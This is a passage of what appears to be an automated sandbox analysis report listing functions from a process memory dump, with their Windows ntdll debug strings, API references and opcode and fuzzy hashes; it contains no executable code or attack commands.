                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                            • API String ID: 0-484625025
                            • Opcode ID: 8bff2cf13ebfc13e5cc3e29eb78e8a0e38a5f0a045c9381f87a74fce08dc3b61
                            • Instruction ID: c87bc2e67e1b12f4e8f90517a4060a6d58adaf4088be24ef6de60b5be772fa53
                            • Opcode Fuzzy Hash: 8bff2cf13ebfc13e5cc3e29eb78e8a0e38a5f0a045c9381f87a74fce08dc3b61
                            • Instruction Fuzzy Hash: C0512A3160030C6EEB10AA68DC85FEE77A8EF45708F000AA9D545E7291E7B0BE45CF91
                            Function 04956940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                            • Instruction ID: 9fcf6e3cee4dcde0449ae4dc8a1a54a933591c67732a71fe5aa73b8a3d39308b
                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                            • Instruction Fuzzy Hash: C1022671508341AFD304DF28C894A6FBBE5EFC8704F648A6DF9899B264DB71E905CB42
                            Function 048CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-$0$0
                            • API String ID: 1302938615-699404926
                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction ID: 55a6aab543954d7715c9969c83c20f235521555ba151ffd9153486c75d09b50e
                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                            • Instruction Fuzzy Hash: 4481AE70E45A499FDF248E68E892BBEBBA1EF45350F184B1DE861E7290D734F8408B51
                            Function 049320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$[$]:%u
                            • API String ID: 48624451-2819853543
                            • Opcode ID: dffc05168318bfc98056c32afb8e6475408efdd6879d77b5e33a0e7969a003a6
                            • Instruction ID: 7381f8da95be170736179b465e683207998edc34fa7b2cf51eea539cb3f7ca26
                            • Opcode Fuzzy Hash: dffc05168318bfc98056c32afb8e6475408efdd6879d77b5e33a0e7969a003a6
                            • Instruction Fuzzy Hash: 1E214F76A00119ABDB10DFA9C950EEEBBEDEF45645F04056AE945E3200E770E9019BA1
                            Function 048AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048F02BD
                            • RTL: Re-Waiting, xrefs: 048F031E
                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048F02E7
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                            • API String ID: 0-2474120054
                            • Opcode ID: acb2b73383ed410518419f85d3859c4d7370ccf01f7aa3a6f9af8f7b85ec63c5
                            • Instruction ID: 6c1de7582569bd7c922855cfb9c807dd3d4a7b786f77f1e694a8f7b0fee1dd27
                            • Opcode Fuzzy Hash: acb2b73383ed410518419f85d3859c4d7370ccf01f7aa3a6f9af8f7b85ec63c5
                            • Instruction Fuzzy Hash: 37E190306047419FE725CF28C884B2AB7E0AB89318F144F6DE695C72D1E7B4F955CB52
                            Function 048BBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 048F7B7F
                            • RTL: Re-Waiting, xrefs: 048F7BAC
                            • RTL: Resource at %p, xrefs: 048F7B8E
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: 2ab7eb4907f9e920eeb48ff03c11392d8781c6e9244a64734061e9a6564861b0
                            • Instruction ID: 24136245513e8dc4914cd8a926074c2af356182723d3b084d4706cd1ee1cdeed
                            • Opcode Fuzzy Hash: 2ab7eb4907f9e920eeb48ff03c11392d8781c6e9244a64734061e9a6564861b0
                            • Instruction Fuzzy Hash: F141BE317057029FE720DE298C40BAAB7E5EB89714F000F2DE99ADBB80DB71F5058B91
                            Function 048BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048F728C
                            Strings
                            • RTL: Re-Waiting, xrefs: 048F72C1
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 048F7294
                            • RTL: Resource at %p, xrefs: 048F72A3
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: cd956f8002accb6607414505ffaabd0097192f6524b21fdb94f1d793464c367b
                            • Instruction ID: 3e37b5ba76c413a228d0dd10d1aef2526f7c75550be2e106016fda09bb30b8e5
                            • Opcode Fuzzy Hash: cd956f8002accb6607414505ffaabd0097192f6524b21fdb94f1d793464c367b
                            • Instruction Fuzzy Hash: 4841C031700206AFE720DE65CC41B6AB7A5FB84714F104B29FA96EB780DB71F8528BD1
                            Function 04932300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: ___swprintf_l
                            • String ID: %%%u$]:%u
                            • API String ID: 48624451-3050659472
                            • Opcode ID: f02741d8e6fe2dca8741dcc3dcb30a05445ea14a22c20625c8466c9686156b2e
                            • Instruction ID: 3255f284c75462366673f64289830cddc231cc838e241b8c55f4834e40952f36
                            • Opcode Fuzzy Hash: f02741d8e6fe2dca8741dcc3dcb30a05445ea14a22c20625c8466c9686156b2e
                            • Instruction Fuzzy Hash: C6318472A012199FDB20DF29CC40BEE77BCEB45715F4445A5E849E3200EB30FA449BA2
                            Function 048C7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction ID: 68e767fc363d9b09f4c6ae811264e4549ffba3b84b6d0feda3ca8df347755ebf
                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction Fuzzy Hash: EE919E71E1021BDADB24DE69C881ABEB7A5AF44724F144F1EEC55E72C0E770E9408F21
                            Function 04889126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.4440875262.0000000004850000.00000040.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                            • Associated: 00000008.00000002.4440875262.0000000004979000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.000000000497D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.4440875262.00000000049EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_4850000_openfiles.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: 20e07c74faa1608948256d156d08cb181ae4995b0b991874d9f706b0788f2a78
                            • Instruction ID: 5f70bb5f04d64f9cca59d64546e4e1a179377cb9a27f9b5a66e31140af7966a2
                            • Opcode Fuzzy Hash: 20e07c74faa1608948256d156d08cb181ae4995b0b991874d9f706b0788f2a78
                            • Instruction Fuzzy Hash: 10813CB5D002699BDB31DB54CC44BEAB7B8AB09714F0446EAE919F7240E7706E80CF61